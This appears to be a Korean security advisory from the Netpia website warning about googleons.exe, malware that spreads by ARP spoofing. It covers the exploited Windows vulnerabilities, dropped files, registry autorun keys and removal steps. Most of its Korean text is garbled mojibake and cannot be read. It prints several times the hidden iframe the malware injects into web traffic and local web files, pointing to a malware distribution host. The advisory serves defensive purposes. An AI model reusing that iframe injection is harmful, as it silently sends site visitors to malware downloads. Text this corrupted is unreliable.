ȨÁÖ¼Ò⠷α×ÀΠȸ¿ø°¡ÀÔ ³» ÇѱÛÁÖ¼Ò °ü¸® °í°´¸¸Á·¼¾ÅÍ Åä·Ð°Ô½ÃÆÇ »çÀÌÆ®¸Ê °í°´ ÁöÅ´ÀÌ
Ȩ / ³ÝÇÇ¾Æ¼Ò½Ä / °øÁö»çÇ×
 
°øÁö»çÇ×
¾ð·Ðº¸µµ
 
ÀÚÁÖ ¹¯´Â Áú¹®°ú ´äº¯
°í°´ ¹®ÀÇ °Ô½ÃÆÇ
 
Á¦¸ñ  ARP Spoofing °ø°Ý ¾Ç¼ºÄÚµå ÁÖÀÇ
 
¡à °³¿ä

o ÃÖ±Ù ±¹³»¿¡¼­ ARP SpoofingÀ» ÅëÇØ °¨¿°µÇ°í, °¨¿° ½Ã ³×Æ®¿öÅ©¸¦ ¸¶ºñ ½ÃÅ°´Â ¾Ç¼ºÄڵ尡
µîÀåÇÏ¿© ÁÖÀÇ°¡ ÇÊ¿äÇÔ
o ƯÈ÷ ³×Æ®¿öÅ© °ü¸®ÀÚ´Â ³»ºÎ ³×Æ®¿öÅ©¿¡¼­ ARP Spoofing °ø°Ý ¿©ºÎ¸¦ ÁÖ±âÀûÀ¸·Î ŽÁöÇÏ°í
°ø°Ý ±Ù¿øÁö¸¦ ÆľÇÇÏ¿© °ü·Ã ¾Ç¼ºÄڵ尡 ½ÇÇà ¹× ´Ù¿î·Îµå µÇÁö ¾Êµµ·Ï ÁÖÀÇ°¡ ÇÊ¿äÇÔ


¡à ÀüÆĹæ¹ý

o ÃÖÃÊ googleons.exe¿¡ °¨¿°µÈ PC´Â ARP Spoofing °ø°Ý
- ÇØ´ç ¾Ç¼ºÄÚµå °¨¿°½Ã ³×Æ®¿öÅ©¿¡ Á¸ÀçÇϴ ȣ½ºÆ® ¹× °ÔÀÌÆ®¿þÀ̸¦ ´ë»óÀ¸·Î ARP Reply¸¦
Áö¼ÓÀûÀ¸·Î º¸³¿
- °ÔÀÌÆ®¿þÀÌÀÇ MAC ÁÖ¼Ò¿Í °ø°Ý´ë»ó È£½ºÆ®ÀÇ MAC ÁÖ¼Ò¸¦ À§Á¶ÇÏ´Â ARP Reply¸¦ Áö¼ÓÀûÀ¸·Î
º¸³¿

o °¨¿°µÈ PC¿Í µ¿ÀÏ ³×Æ®¿öÅ©¿¡ ¿¬°áµÇ¾î Àִ ȣ½ºÆ®µéÀº °¨¿°µÈ PC¸¦ °ÔÀÌÆ®¿þÀÌ·Î ÀνÄÇÏ°Ô
ÇÏ¿© ¸ðµç ÆÐŶÀ» ¸ð´ÏÅ͸µ ¹× º¯Á¶ ÇÒ ¼ö ÀÖÀ½
- ARP Spoofing°ø°ÝÀ¸·Î Á¤»ó È£½ºÆ®°¡ À¥ Á¢¼Ó ½Ã °¨¿° PC´Â ÆÐŶÀ» °¡·Îä°í ¾Æ·¡¿Í °°Àº
Á¤º¸¸¦ »ðÀÔÇØ ¾Ç¼ºÄÚµå À¯Æ÷Áö »çÀÌÆ®·Î À¯µµ

"<iframe src="http://down.online"[»ý·«].net/page/image/zzh.htm height=0></iframe>"

o ¾Ç¼ºÄÚµå À¯Æ÷Áö down.online[»ý·«].netÀ¸·Î À¯µµµÈ PCÁß ¾Æ·¡¿Í °°Àº À©µµ¿ì Ãë¾àÁ¡ ÆÐÄ¡°¡
¾ÈµÈ »çÀÌÆ®´Â googleons.exe¿¡ °¨¿°µÊ

- MS05-025
- MS06-014
- MS07-017
- MS07-027


¡à ¾Ç¼ºÇàÀ§ (googleons.exe)

o °¨¿° PC¿Í µ¿ÀÏ ³×Æ®¿öÅ© ´ë¿ª ARP Spoofing °ø°Ý


o µ¿ÀÏ ³×Æ®¿öÅ©¿¡ Á¸ÀçÇÏ´Â PCµéÀÇ HTTP Åë½Å ÆÐŶ º¯Á¶
"<iframe src="http://down.online"[»ý·«].net/page/image/zzh.htm height=0></iframe>" »ðÀÔ

o USB¸¦ ÅëÇÑ ¾Ç¼ºÄÚµå ÀüÆÄ

o °¨¿° PC¿¡ Á¸ÀçÇÏ´Â .html, tml, asp, php, jsp È®ÀåÀÚ¿¡ ¾Æ·¡¿Í °°Àº ¾Ç¼ºÄÚµå »ðÀÔ
- "<iframe src="http://down.online"[»ý·«].net/page/image/pd.htm height=0></iframe>"

o °¨¿°½Ã »ý¼ºµÇ´Â ÆÄÀÏ
- C:\Document and Settings\[°èÁ¤]\Local Settings\Temp\
autoexec.bat (down.exe ÃÖÃÊ °¨¿° ¾Ç¼ºÄÚµå, googleons.exe¸¦ ´Ù¿î·Îµå ¹× ½ÇÇà)
googleons.exe
disocoo.exe (½ÇÇàµÚ »èÁ¦)
npptools.dll
Packet.dll
WanPacket.dll
yahoons.exe (½ÇÇàµÚ »èÁ¦)
- C:\windows\system32\ (yahoons.exe ½ÇÇà¿¡ ÀÇÇØ »ý¼ºµÇ´Â ÆÄÀϵé)
dllhost32.exe
mh104.dll
moyu103.dll
mosou.exe
mydata.exe
nwizwmgjs.exe
nwizwmgjs.dll
nwizzhuxians.exe
nwizzhuxians.dll
RAV00xx.exeµî ´Ù¼ö

o ºÎÆà ÈÄ Àç½ÃÀÛ ÇÒ ¼ö ÀÖ´Â ·¹Áö½ºÆ®¸®¿¡ µî·Ï
- HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- À̸§ : svc
- ÆÄÀÏ À̸§ : googleons.exe


¡à °¨¿°¿©ºÎ È®ÀÎ ¹× Ä¡·á¹æ¹ý

o °¨¿°¿©ºÎ È®ÀÎ
- L3 ¶Ç´Â ¶ó¿ìÅÍ¿¡¼­ °¨¿° PC È®ÀÎ
Áߺ¹ MAC ÁÖ¼Ò IP È®ÀÎ (¾Ç¼ºÄÚµå °¨¿° IP È®ÀÎ)
¡Ø krcert ȨÆäÀÌÁö->±â¼ú¹®¼­->ARP Spoofing °ø°Ý ¹× ´ëÃ¥ Âü°í

- ARP Spoofing ÇÇÇØ PC¿¡¼­ °ø°Ý PC È®ÀÎ
Àüü ³×Æ®¿öÅ© Ping ½ºÄµ
Áߺ¹ MAC ÁÖ¼Ò IP È®ÀÎ


¡Ø krcert ȨÆäÀÌÁö->±â¼ú¹®¼­->ARP Spoofing °ø°Ý ¹× ´ëÃ¥ Âü°í


- ¾Ç¼ºÄÚµå °¨¿° ¹× ARP Spoofing °ø°Ý PC È®ÀÎ
C:\Document and Settings\[°èÁ¤]\Local Settings\Temp\googleons.exe Á¸Àç¿©ºÎ È®ÀÎ
googleons.exe ÇÁ·Î¼¼½º ½ÇÇà¿©ºÎ È®ÀÎ [¾Æ·¡ Ä¡·á¹æ¹ý ÂüÁ¶]


o Ä¡·á¹æ¹ý
- C:\Document and Settings\[°èÁ¤]\Local Settings\Temp\ ÇÏÀ§ ¾Ç¼ºÄÚµåµé »èÁ¦




- À©µµ¿ì ½Ã½ºÅÛ Æú´õ¿¡ Á¸ÀçÇÏ´Â ¾Ç¼ºÄÚµåµé »èÁ¦




- googleons.exe ÇÁ·Î¼¼½º ³¡³»±â
"Ctrl" + "Alt" + "Del" Ŭ¸¯ ÈÄ ÇÁ·Î¼¼½º ¸Þ´º¿¡¼­ googleons.exe ÇÁ·Î¼¼½º Á¾·á




- ·¹Áö½ºÆ®¸® »èÁ¦
googleons Àç½ÃÀÛ ·¹Áö½ºÆ®¸® »èÁ¦
½ÃÀÛ ¡æ ½ÇÇà ¼±ÅÃ, "regedit" ÀÔ·Â ÈÄ ¾Ç¼ºÄڵ尡 »ý¼ºÇÑ ¾Æ·¡ÀÇ ·¹Áö½ºÆ®¸® »èÁ¦
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run




. ±âŸ ¾Ç¼ºÄÚµå ·¹Áö½ºÆ®¸® »èÁ¦
½ÃÀÛ ¡æ ½ÇÇà ¼±ÅÃ, "regedit" ÀÔ·Â ÈÄ ¾Ç¼ºÄڵ尡 »ý¼ºÇÑ ¾Æ·¡ÀÇ ·¹Áö½ºÆ®¸® »èÁ¦
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run






¡à ¿¹¹æ ¹æ¹ý

o °¨¿°À» À§ÇÑ »çÀü ¿¹¹æ ¹æ¹ý
- À©µµ OS ÃֽŠÆÐÄ¡ ½Ç½Ã


 
 
 
ÀÌÀü±Û   [º¸¾È¾÷µ¥ÀÌÆ®]2007³â 6¿ù MS ¿ù°£ º¸¾È ¾÷µ¥ÀÌÆ® ±Ç... 
´ÙÀ½±Û   Adobe Flash Player ´ÙÁß Ãë¾àÁ¡ º¸¾È¾÷µ¥ÀÌÆ® ±Ç°í 

Çѱ¹¾îEnglishJapanese Á¦ÈÞÁ¦¾È ÀÎÀçä¿ë ¼­ºñ½º ¾à°ü ¹× Á¤Ã¥ °³ÀÎÁ¤º¸Ãë±Þ¹æħ Ã¥ÀÓÇÑ°è ¹× ¹ýÀû °íÁö À̸ÞÀϹ«´Ü¼öÁý °ÅºÎ
  ´ëÇ¥ÀüÈ­ : 02-3665-0123   °í°´»ó´ã : 02-2165-3000   FAX : 02-2671-5613   e¸ÞÀÏ : °í°´»ó´ã@³ÝÇǾÆÄß
Copyright (C) 1995 - 2024 Netpia, Inc. All rights reserved.